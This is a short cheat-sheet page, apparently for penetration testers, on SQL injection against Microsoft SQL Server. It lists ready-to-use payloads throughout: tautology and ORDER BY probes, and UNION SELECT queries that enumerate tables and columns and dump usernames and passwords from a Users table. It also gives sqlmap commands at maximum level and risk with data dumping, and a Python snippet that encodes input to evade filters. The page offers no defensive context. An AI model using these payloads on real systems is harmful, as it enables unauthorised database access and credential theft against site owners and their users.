Skip to main content

SQL Injection

MSQL

Test

' or 1=1-- -

Identify number columns

Increase from 1 (column) ' order by 1-- - Until error or different content ' order by 7-- -

Confirm number columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -

Get columns from table Users

' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3

Post request

sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345"  --batch --dump --level 5 --risk 3

Bypass

Encoding payload using utf-16

user_input = input('> ').strip()
utf = [f"\\u00{ord(i):02x}" for i in user_input]
print(''.join(utf))